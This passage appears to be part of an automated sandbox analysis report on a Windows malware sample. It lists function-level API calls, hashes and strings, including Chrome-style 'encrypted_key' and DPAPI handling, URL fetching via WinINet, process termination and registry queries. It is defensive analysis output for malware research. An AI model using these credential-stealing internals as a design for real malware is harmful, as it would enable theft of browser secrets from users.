memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C

Strings

, xrefs: 00409DC5
DPAPI, xrefs: 00409D96
"encrypted_key":", xrefs: 00409D5D

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 4154055062-738592651
Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98

Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00417F84
lstrlenA.KERNEL32(00000000), ref: 00417FB1
lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
strtok_s.MSVCRT ref: 00417FF1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95

Function 021B8347 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 021B836C
lstrlen.KERNEL32(00000000), ref: 021B83B2
lstrcpy.KERNEL32(00000000,00000000), ref: 021B83E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 021B83F9
lstrlen.KERNEL32(00000000), ref: 021B8437
lstrcpy.KERNEL32(00000000,00000000), ref: 021B8466
strtok_s.MSVCRT ref: 021B8476

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction ID: 7e5cec90809507a949e70e6867d5c01b2e63a9948cfa425adaa36f7c88b8ebbe
Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
Instruction Fuzzy Hash: 0E417C75640206DFCB22EF68D984BABBBF9EF44B04F028059EC49D7254EB34D941CBA0

Function 021A57D7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 021A57F0
RtlAllocateHeap.NTDLL(00000000), ref: 021A57F7
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 021A580D
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 021A5828
InternetReadFile.WININET(?,?,00000400,00000001), ref: 021A5853
InternetCloseHandle.WININET(?), ref: 021A5892
InternetCloseHandle.WININET(00000000), ref: 021A5899

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 67ba33c8b63f2fdb9e1c36442d0b7712cbe7cf1a633852cc35496bd5522a52a1
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: 4C41AE74E40204AFDB24CF55DC58B99B7B6FF48314F5480A9E9099B2A0D7B1A941CF94

Function 021C4787 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 021C47A1
GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,021B558F), ref: 021C47CC
RtlAllocateHeap.NTDLL(00000000), ref: 021C47D3
wsprintfW.USER32 ref: 021C47E2
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 021C4851
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 021C4860
CloseHandle.KERNEL32(00000000,?,?), ref: 021C4867

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction ID: e9623b138901b7b349c539c0582b11bd2a765f0594a0046e6d1040329ccce524
Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
Instruction Fuzzy Hash: 42319E75A44248ABEB20DBE0DC88FDEB779AF44740F100069FA05E7180DBB4A6408BA5

Function 00417DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417DD8

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
std::_Xinvalid_argument.LIBCPMT ref: 00417E11
memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417DF1, 00417E0C
invalid string position, xrefs: 00417DD3

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
String ID: invalid string position$string too long
API String ID: 702443124-4289949731
Opcode ID: 99575f7a4327caf9aecf9ec4825ab59a8845c7b0620851515899ba8512b0c346
Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
Opcode Fuzzy Hash: 99575f7a4327caf9aecf9ec4825ab59a8845c7b0620851515899ba8512b0c346
Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9

Function 021C2A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 021C2A9C
RtlAllocateHeap.NTDLL(00000000), ref: 021C2AA3

Part of subcall function 021C2B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 021C2B2C
Part of subcall function 021C2B17: RtlAllocateHeap.NTDLL(00000000), ref: 021C2B33
Part of subcall function 021C2B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,021C2AB0), ref: 021C2B52
Part of subcall function 021C2B17: RegQueryValueExA.ADVAPI32(021C2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 021C2B6C
Part of subcall function 021C2B17: RegCloseKey.ADVAPI32(021C2AB0), ref: 021C2B76

RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,021B97C7), ref: 021C2AD8
RegQueryValueExA.ADVAPI32(021B97C7,00638C34,00000000,00000000,00000000,000000FF), ref: 021C2AF3
RegCloseKey.ADVAPI32(021B97C7), ref: 021C2AFD

Strings

Windows 11, xrefs: 021C2AB7

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: bde2305bbed10f2f2063ad608f1551036a9afda2da81d61ac734cc25bc7c1846
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: B301AD75680309BFE714DBA4AC89EEA7B7EEB44315F101159FE09D3290DBB09D448BE0

Function 021A7C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 021A7977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 021A79AC
Part of subcall function 021A7977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 021A79F1
Part of subcall function 021A7977: strlen.MSVCRT ref: 021A7A25
Part of subcall function 021A7977: StrStrA.SHLWAPI(?,0043508C), ref: 021A7A5F
Part of subcall function 021A7977: strcpy_s.MSVCRT ref: 021A7A88
Part of subcall function 021A7977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 021A7A93
Part of subcall function 021A7977: HeapFree.KERNEL32(00000000), ref: 021A7A9A
Part of subcall function 021A7977: strlen.MSVCRT ref: 021A7AA7

lstrcat.KERNEL32(00638E68,0043509C), ref: 021A7C37
lstrcat.KERNEL32(00638E68,?), ref: 021A7C64
lstrcat.KERNEL32(00638E68,004350A0), ref: 021A7C76
lstrcat.KERNEL32(00638E68,?), ref: 021A7C97
wsprintfA.USER32 ref: 021A7CB7
lstrcpy.KERNEL32(00000000,?), ref: 021A7CE0
lstrcat.KERNEL32(00638E68,00000000), ref: 021A7CEE
lstrcat.KERNEL32(00638E68,0043509C), ref: 021A7D07

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
String ID:
API String ID: 2460923012-0
Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction ID: 4e25b03f2351f6315399b4a7e4ca3142b3cda788ba1187cf26cbc913e2ca1617
Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
Instruction Fuzzy Hash: C8310776A40318EFCB24DB64DC54EAEF77AFB88314F141519F60A93250DB71EA41CBA0

Function 021AA0A7 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 021AA136
LocalAlloc.KERNEL32(00000040), ref: 021AA16E

Part of subcall function 021C7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 021C7495

lstrcpy.KERNEL32(00000000,0043520C), ref: 021AA279

Strings

@"C, xrefs: 021AA21A
@, xrefs: 021AA14F

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocalmemset
String ID: @$@"C
API String ID: 4098468873-2306624759
Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction ID: f47b87cfebfb4d3fa1adb166d1847942abe7480853caa2ca41da6a561a8d0b2f
Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
Instruction Fuzzy Hash: 3C51EE75A80249AFDB10EFB4DC90B9E7BB9AF04318F144465ED09EB240DB74E901CF80

Function 021BDB27 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 021BDB53
RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 021BDB73
RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 021BDB9A
RegCloseKey.ADVAPI32(?), ref: 021BDBA5
lstrcat.KERNEL32(?,?), ref: 021BDBCB
lstrcat.KERNEL32(?,00638968), ref: 021BDBDD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
Instruction ID: da72b81ecf86f119bf3f41fb4eb72749cd21eec7ae0427a10cdf10a29da6881c
Opcode Fuzzy Hash: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
Instruction Fuzzy Hash: 74411A75244249AFD724EF28DC55FDA77A6AF84304F008828F94DC72A0EB71E949CF92

Function 00409AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8

Function 004089B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

std::_Xinvalid_argument.LIBCPMT ref: 004089FD

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B

Strings

string too long, xrefs: 004089F8
invalid string position, xrefs: 004089C1

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
String ID: invalid string position$string too long
API String ID: 2202983795-4289949731
Opcode ID: 7d3babc7a74746963635f86fe813522951d2f98be8a78b20923998d238a7ebd4
Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
Opcode Fuzzy Hash: 7d3babc7a74746963635f86fe813522951d2f98be8a78b20923998d238a7ebd4
Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED

Function 021A7097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,004074D0,00000040,021A7634), ref: 021A70A7
memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 021A70E3
GetProcessHeap.KERNEL32(00000008,?), ref: 021A711B
RtlAllocateHeap.NTDLL(00000000), ref: 021A7122

Strings

@, xrefs: 021A7097

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocateProcess
String ID: @
API String ID: 966719176-2766056989
Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction ID: fc1adc3f6af7c6a3329a3e08fdb24e4e6e1309dd8afd1df446aae35e834f4562
Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
Instruction Fuzzy Hash: BE2190786407019BDB248F20CC94BBBB3E9FB40705F84446CE946CB684F7B4EA46CB90

Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
std::exception::exception.LIBCMT ref: 00408B8B
__CxxThrowException@8.LIBCMT ref: 00408BA0

Strings

x@, xrefs: 00408B7D, 00408B80
Pv@, xrefs: 00408B99

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$x@
API String ID: 3448701045-2507878009
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
